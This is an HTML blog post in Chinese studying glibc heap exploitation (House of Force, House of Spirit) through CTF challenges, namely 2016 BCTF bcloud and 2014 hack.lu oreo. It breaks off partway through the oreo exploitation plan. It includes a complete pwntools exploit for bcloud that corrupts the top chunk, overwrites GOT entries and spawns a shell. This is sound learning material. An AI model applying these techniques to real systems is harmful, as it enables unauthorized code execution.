

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#795548">
  <meta name="description" content="">
  <meta name="author" content="一叶枯舟">
  <meta name="keywords" content="">
  
  <title>堆的House Of Force,House of spirit,Off by one 学习 - 一叶枯舟</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>一叶枯舟</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="堆的House Of Force,House of spirit,Off by one 学习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-05-27 18:13" pubdate>
        2021年5月27日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      72
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">堆的House Of Force,House of spirit,Off by one 学习</h1>
            
            <div class="markdown-body">
              <p><strong>0x00</strong>:</p>
<pre><code>这其实是接着上个《SploitFun Linux x86 Exploit 开发系列教程》的后续实验，书上关于堆的很多漏洞现在已经不可用或需要特定环境，所以故拿ctf题目继续学习。
</code></pre>
<h1 id="堆的house-of-forcehouse-of-spiritoff-by-one-学习"><a class="markdownIt-Anchor" href="#堆的house-of-forcehouse-of-spiritoff-by-one-学习"></a> 堆的House Of Force,House of spirit,Off by one 学习</h1>
<h2 id="house-of-force"><a class="markdownIt-Anchor" href="#house-of-force"></a> House Of Force</h2>
<h3 id="漏洞原理"><a class="markdownIt-Anchor" href="#漏洞原理"></a> 漏洞原理</h3>
<p>House Of Force 是一种堆利用方法，但是并不是说 House Of Force 必须得基于堆漏洞来进行利用。如果一个堆 (heap based) 漏洞想要通过 House Of Force 方法进行利用，需要以下条件：</p>
<p>1.能够以溢出等方式控制到 top chunk 的 size 域</p>
<p>2.能够自由地控制堆分配尺寸的大小</p>
<p>House Of Force 产生的原因在于 glibc 对 top chunk 的处理，根据前面堆数据结构部分的知识我们得知，进行堆分配时，如果所有空闲的块都无法满足需求，那么就会从 top chunk 中分割出相应的大小作为堆块的空间。</p>
<p>那么，当使用 top chunk 分配堆块的 size 值是由用户控制的任意值时会发生什么？答案是，可以使得 top chunk 指向我们期望的任何位置，这就相当于一次任意地址写。然而在 glibc 中，会对用户请求的大小和 top chunk 现有的 size 进行验证</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 获取当前的top chunk，并计算其对应的大小</span><br>victim = av-&gt;top;<br>size   = chunksize(victim);<br><span class="hljs-comment">// 如果在分割之后，其大小仍然满足 chunk 的最小大小，那么就可以直接进行分割。</span><br><span class="hljs-keyword">if</span> ((<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>) (size) &gt;= (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>) (nb + MINSIZE)) <br>&#123;<br>    remainder_size = size - nb;<br>    remainder      = chunk_at_offset(victim, nb);<br>    av-&gt;top        = remainder;<br>    set_head(victim, nb | PREV_INUSE |<br>            (av != &amp;main_arena ? NON_MAIN_ARENA : <span class="hljs-number">0</span>));<br>    set_head(remainder, remainder_size | PREV_INUSE);<br><br>    check_malloced_chunk(av, victim, nb);<br>    <span class="hljs-keyword">void</span> *p = chunk2mem(victim);<br>    alloc_perturb(p, bytes);<br>    <span class="hljs-keyword">return</span> p;<br>&#125;<br><br></code></pre></td></tr></table></figure>
<p>然而，如果可以篡改 size 为一个很大值，就可以轻松的通过这个验证，这也就是我们前面说的需要一个能够控制 top chunk size 域的漏洞。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>) (size) &gt;= (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>) (nb + MINSIZE)<br></code></pre></td></tr></table></figure>
<p>一般的做法是把 top chunk 的 size 改为 - 1，因为在进行比较时会把 size 转换成无符号数，因此 -1 也就是说 unsigned long 中最大的数，所以无论如何都可以通过验证。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c">remainder   = chunk_at_offset(victim, nb);<br>av-&gt;top    = remainder;<br><span class="hljs-comment">/* Treat space at ptr + offset as a chunk */</span><br>\<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> chunk_at_offset(p, s) ((mchunkptr)(((char *) (p)) + (s)))</span><br></code></pre></td></tr></table></figure>
<p>之后这里会把 top 指针更新，接下来的堆块就会分配到这个位置，用户只要控制了这个指针就相当于实现任意地址写任意值 (write-anything-anywhere)。</p>
<p><strong>与此同时，我们需要注意的是，topchunk</strong> <strong>的 size</strong> <strong>也会更新，其更新的方法如下</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c">victim = av-&gt;top;<br>size  = chunksize(victim);<br>remainder_size = size - nb;<br>set_head(remainder, remainder_size | PREV_INUSE);<br></code></pre></td></tr></table></figure>
<p>所以，如果我们想要下次在指定位置分配大小为 x 的 chunk，我们需要确保 remainder_size 不小于 x+ MINSIZE。</p>
<h2 id="2016-bctf-bcloud"><a class="markdownIt-Anchor" href="#2016-bctf-bcloud"></a> 2016 BCTF bcloud</h2>
<h3 id="程序分析"><a class="markdownIt-Anchor" href="#程序分析"></a> 程序分析</h3>
<p>检查程序，程序只开启了canary和nx保护</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111002349.png" srcset="/img/loading.gif" lazyload alt="image-20210802111002349" style="zoom:80%;">
<p>然后用ida分析，程序刚开始会创建一个名字，这里最多读取64个字节的&amp;s，然后创建v2，这里malloc是在读取&amp;s之后的，如果我们输入了64个字节&amp;s后的/x00截断符就会被v2的地址覆盖，strcpy就会把&amp;s和v2的地址复制进去</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111059153.png" srcset="/img/loading.gif" lazyload alt="image-20210802111059153" style="zoom:80%;">
<p>然后下面的函数就会输出&amp;s就会把v2地址输出</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111114857.png" srcset="/img/loading.gif" lazyload alt="image-20210802111114857" style="zoom:80%;">
<p>还有一处漏洞在设置org和host处，这里也是和上面一样的漏洞，当输入0x40个&amp;s时，后面v2的值就会把末尾的\x00给覆盖，strcpy就会继续往下复制，而v2分配的最晚，没有堆被free，因此v2分配的堆快是与top chunk相邻的堆快，这里如果复制了0x40个数据，之后的v2的值就会覆盖top chunk的头部的pre_size，之后v3的内容就会先覆盖topchunk的size，这样我们就可以把topchunk的size覆盖成FF FF FF FF，也就是-1。</p>
<img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111139289.png" srcset="/img/loading.gif" lazyload alt="image-20210802111139289" style="zoom:80%;"> 
<p>New_note函数</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111205577.png" srcset="/img/loading.gif" lazyload alt="image-20210802111205577" style="zoom:80%;">
<p>这里它不会检查我们输入的长度，就满足了house of force的第二个条件，我们可以自定义分配的堆大小</p>
<p>注意这里在创建堆快时，会把堆快的指针存放在0x804b120处，还有堆快的大小在0x804b0a0处，注意这里malloc的堆快大小是v2+4，也就是我们输入的大小+4</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111222632.png" srcset="/img/loading.gif" lazyload alt="image-20210802111222632" style="zoom:80%;">
<p>Show选项</p>
<p>这个选项什么都没输出</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111242196.png" srcset="/img/loading.gif" lazyload alt="image-20210802111242196" style="zoom:80%;">
<p>Edit选项</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111306828.png" srcset="/img/loading.gif" lazyload alt="image-20210802111306828" style="zoom:80%;">
<p>Delete选项</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111321924.png" srcset="/img/loading.gif" lazyload alt="image-20210802111321924" style="zoom:80%;">
<p>Syn选项，没有什么用</p>
<p><img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111339035.png" srcset="/img/loading.gif" lazyload alt="image-20210802111339035"></p>
<h3 id="利用思路"><a class="markdownIt-Anchor" href="#利用思路"></a> 利用思路</h3>
<ol>
<li>
<p>首先，我们要在输入name的时候输入0x40大小的的参数，然后就会泄露出name创建的内存空间的指针（第一个堆快的指针），利用这个我们可以计算top chunk的位置。</p>
</li>
<li>
<p>然后在输入org以及host的时候，我们先输入0x40个数据，然后v2指针的位置就会覆盖输入数据末尾的/x00截断符，然后strcpy就会继续往下复制，这里v2是后创建的堆快，所以和top chunk相邻，这时候v2的指针覆盖了top chunk的prev_size的部分，v3内容就会覆盖top chunk的size</p>
</li>
</ol>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111407277.png" srcset="/img/loading.gif" lazyload alt="image-20210802111407277" style="zoom:80%;">
<ol start="3">
<li>我们先把top chunk的size覆盖成FF FF FF FF 这样就可以通过top chunk分配的验证，然后选择new一个chunk，大小为0x804b0a0 -8 - (泄露的第一个堆快地址- 8+ 0x48*3) - 12我们要把top chunk分配到0x804b0a0处，这样就可以控制分配的堆快大小以及位置了。</li>
</ol>
<p>计算方法：泄露的地址-8是因为还有堆头，3个0x48是name+host+org的大小，-12是因为top chunk的堆头+程序中malloc+4，-8是为了让写入的数据刚好在0x804b0a0。</p>
<ol start="4">
<li>
<p>然后我们可以先把free_ got地址劫持为puts_plt的地址，然后调用delete函数泄露atoi的地址，就可以计算libc基址，得到system的地址了。</p>
</li>
<li>
<p>我们得先修改3个堆快的大小为足够大小，然后指针改为atoi_got，free_got，atoi_got，利用puts泄露一个atoi的地址，另外一个用来修改atoi的地址为system_addr，然后在开始调用atoi时输入/bin/sh就可以执行system（/bin/sh）拿到shell</p>
</li>
</ol>
<h3 id="gdb调试"><a class="markdownIt-Anchor" href="#gdb调试"></a> Gdb调试</h3>
<p>开始输入的0x40个a，泄露的第一块堆的地址</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111431784.png" srcset="/img/loading.gif" lazyload alt="image-20210802111431784" style="zoom:80%;">
<p>开始时输入name，host，org创建的三个堆块，topchunk在org的下方，也就是0xa0090d8处</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111749554.png" srcset="/img/loading.gif" lazyload alt="image-20210802111749554" style="zoom:80%;">
<p>通过计算偏移，第一次new调用malloc把topchunk分配到了0x804b098处</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111802382.png" srcset="/img/loading.gif" lazyload alt="image-20210802111802382" style="zoom:80%;">
<p>我们就可以从0x804b0a0处开始修改，先把前三个堆快大小修改为足够大（能修改got表大小即可），然后修改0x804b120处的堆指针为atoi_got，free_got，atoi_got</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111817122.png" srcset="/img/loading.gif" lazyload alt="image-20210802111817122" style="zoom:80%;">
<p>之后把free_got修改为puts_plt泄露的atoi地址</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111833329.png" srcset="/img/loading.gif" lazyload alt="image-20210802111833329" style="zoom:80%;">
<h3 id="payload"><a class="markdownIt-Anchor" href="#payload"></a> Payload</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># encoding=UTF-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>p = process(<span class="hljs-string">&quot;./bcloud&quot;</span>)<br>elf = ELF(<span class="hljs-string">&quot;./bcloud&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">new</span>(<span class="hljs-params">length, content</span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;---&gt;&gt;&quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;1&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;Input the length of the note content:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(length))<br>    p.recvuntil(<span class="hljs-string">&quot;Input the content:\n&quot;</span>)<br>    p.send(content)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span>():</span><br>    p.recvuntil(<span class="hljs-string">&quot;---&gt;&gt;&quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;2&quot;</span>)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>, newcontent</span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;---&gt;&gt;&quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;3&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;id:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-built_in">id</span>))<br>    p.recvuntil(<span class="hljs-string">&quot;new content:\n&quot;</span>)<br>    p.sendline(newcontent)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span>(<span class="hljs-params"><span class="hljs-built_in">id</span></span>):</span><br>    p.recvuntil(<span class="hljs-string">&quot;---&gt;&gt;&quot;</span>)<br>    p.sendline(<span class="hljs-string">&quot;4&quot;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;id:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(<span class="hljs-built_in">id</span>))<br><br>name = <span class="hljs-string">&quot;a&quot;</span> * <span class="hljs-number">0x40</span><br>org = <span class="hljs-string">&quot;b&quot;</span> * <span class="hljs-number">0x40</span><br>host = p32(<span class="hljs-number">0xffffffff</span>)<br><br>p.recvuntil(<span class="hljs-string">&quot;name:\n&quot;</span>)<br>p.send(name)<br>firstchunk = u32(p.recvuntil(<span class="hljs-string">&quot;! Welcome&quot;</span>)[-<span class="hljs-number">13</span>:-<span class="hljs-number">9</span>])<br>p.recvuntil(<span class="hljs-string">&quot;Org:\n&quot;</span>)<br>p.send(org)<br>p.recvuntil(<span class="hljs-string">&quot;Host:\n&quot;</span>)<br>p.sendline(host)<br><br>length = <span class="hljs-number">0x804b0a0</span> -<span class="hljs-number">8</span> - (firstchunk + <span class="hljs-number">0x48</span>*<span class="hljs-number">3</span> - <span class="hljs-number">8</span>) - <span class="hljs-number">12</span><br>payload=<span class="hljs-string">&#x27;&#x27;</span><br>new(length, payload)<br><br>puts = elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>free = elf.got[<span class="hljs-string">&#x27;free&#x27;</span>]<br>atoi = elf.got[<span class="hljs-string">&#x27;atoi&#x27;</span>]<br>payload =p32(<span class="hljs-number">30</span>)+p32(<span class="hljs-number">30</span>)+p32(<span class="hljs-number">30</span>)+ <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">116</span>+p32(atoi) + p32(free) + p32(atoi)<br><span class="hljs-comment">#覆盖前3个chunk大小为30，足够修改，然后再覆盖0x804b120处的堆指针</span><br>length = <span class="hljs-built_in">len</span>(payload)<br>new(length, payload)<br><span class="hljs-comment">#p.interactive()</span><br>edit(<span class="hljs-number">1</span>, p32(puts))<br>delete(<span class="hljs-number">0</span>)<br><br>atoi_addr = u32(p.recv()[<span class="hljs-number">0</span>:<span class="hljs-number">4</span>])<br>libc_base = atoi_addr - libc.symbols[<span class="hljs-string">&#x27;atoi&#x27;</span>]<br>system_addr = libc_base + libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br><br>p.sendline(<span class="hljs-string">&quot;3&quot;</span>)<br>p.recvuntil(<span class="hljs-string">&quot;id:\n&quot;</span>)<br>p.sendline(<span class="hljs-string">&quot;2&quot;</span>)<br>p.recvuntil(<span class="hljs-string">&quot;new content:\n&quot;</span>)<br>p.sendline(p32(system_addr))<br>p.recvuntil(<span class="hljs-string">&quot;---&gt;&gt;&quot;</span>)<br>p.sendline(<span class="hljs-string">&quot;/bin/sh\x00&quot;</span>)<br>p.interactive()<br>p.sendline(<span class="hljs-string">&quot;1&quot;</span>)<br>p.recvuntil(<span class="hljs-string">&quot;Input the length of the note content:\n&quot;</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(length))<br>p.interactive()<br><br><br></code></pre></td></tr></table></figure>
<h2 id="house-of-spirit"><a class="markdownIt-Anchor" href="#house-of-spirit"></a> House of Spirit</h2>
<h2 id="漏洞原理-2"><a class="markdownIt-Anchor" href="#漏洞原理-2"></a> 漏洞原理</h2>
<p>该技术的核心在于在目标位置处伪造 fastbin chunk，并将其释放，从而达到分配<strong>指定地址</strong>的 chunk 的目的。</p>
<p>要想构造 fastbin fake chunk，并且将其释放时，可以将其放入到对应的 fastbin 链表中，需要绕过一些必要的检测，即</p>
<p>·    fake chunk 的 ISMMAP 位不能为 1，因为 free 时，如果是 mmap 的 chunk，会单独处理。</p>
<p>·    fake chunk 地址需要对齐， MALLOC_ALIGN_MASK</p>
<p>·    fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。</p>
<p>·    fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ，同时也不能大于av-&gt;system_mem 。</p>
<p>·    fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。</p>
<h2 id="2014-hacklu-oreo"><a class="markdownIt-Anchor" href="#2014-hacklu-oreo"></a> 2014 <a target="_blank" rel="noopener" href="http://hack.lu">hack.lu</a> oreo</h2>
<h3 id="程序分析-2"><a class="markdownIt-Anchor" href="#程序分析-2"></a> 程序分析</h3>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111929070.png" srcset="/img/loading.gif" lazyload alt="image-20210802111929070" style="zoom:80%;">
<p>这个程序只开启了nx和canary保护</p>
<p>然后拖入ida进行分析</p>
<p>程序有5个功能</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802111947858.png" srcset="/img/loading.gif" lazyload alt="image-20210802111947858" style="zoom:80%;">
<p>添加功能</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112002731.png" srcset="/img/loading.gif" lazyload alt="image-20210802112002731" style="zoom:80%;">
<p>这里可以看出来这个分配内存的大致结构了</p>
<p>0 description</p>
<p>0x19 name</p>
<p>0x34 前一个内存的地址</p>
<p>0x38</p>
<p><em>((_DWORD <em>)chunk_addr_dword_804A288 + 13) = v1;，这里是把v1=之前的chunk_addr_dword_804A288（这个地方记录上次分配的内存的地址）处的地址+13</em>4（0x34）的地方赋值成了当前分配的内存的地址，这里DWORD是4字节，所以是chunk_addr_dword_804A288+13</em>4的位置</p>
<p>然后这里读取name的时候存在溢出，这里可以读入56个字节，但是从chunk_addr_dword_804A288+25到+0x38只有31个字节，可以通过溢出覆盖到前一个内存的地址</p>
<p>还有一点是这里每创建一个堆快就会把dword_804A2A4的值加1</p>
<p>show展示功能</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112530269.png" srcset="/img/loading.gif" lazyload alt="image-20210802112530269" style="zoom:80%;">
<p>从最后一个创建的堆开始，根据堆中的前项指针*((_DWORD *)chunk_addr_dword_804A288 + 13)，依次显示之前创建的堆块。</p>
<p>Order（删除）功能</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112600837.png" srcset="/img/loading.gif" lazyload alt="image-20210802112600837" style="zoom:80%;">
<p>依次free掉创建的堆快</p>
<p>Leave功能</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112617926.png" srcset="/img/loading.gif" lazyload alt="image-20210802112617926" style="zoom:80%;">
<p>这里是往804A2A8的地方写入输入的内容，最大128字节，而0x804a2a8这个地方一开始是0x0804a2c0，也就是往0x0804a2c0写入输入的内容</p>
 <img src="/2021/05/27/%E5%A0%86%E7%9A%84House-Of-Force-House-of-spirit-Off-by-one-%E5%AD%A6%E4%B9%A0/image-20210802112643127.png" srcset="/img/loading.gif" lazyload alt="image-20210802112643127" style="zoom:80%;">
<h3 id="利用思路-2"><a class="markdownIt-Anchor" href="#利用思路-2"></a> 利用思路</h3>
<ol>
<li>
<p>首先我们得泄露出libc的基地址，用来计算system的地址，思路是利用输入name的溢出，把堆的前项指针改成printf函数的got表地址，然后通过show选项，打印出printf的真实地址用来计算libc的基址。</p>
</li>
<li>
<p>之后利用House of Spirit，伪造一个fastbin，然后free后把我们可以分配的内存改到0x804A2A8，因为这个地方存放的是leave功能写入的地址，如果我们能控制这个地方，然后改成我们想要修改的函数的got表地址就可以进行利用</p>
</li>
<li>
<p>伪造fastbin的方法：</p>
</li>
</ol>
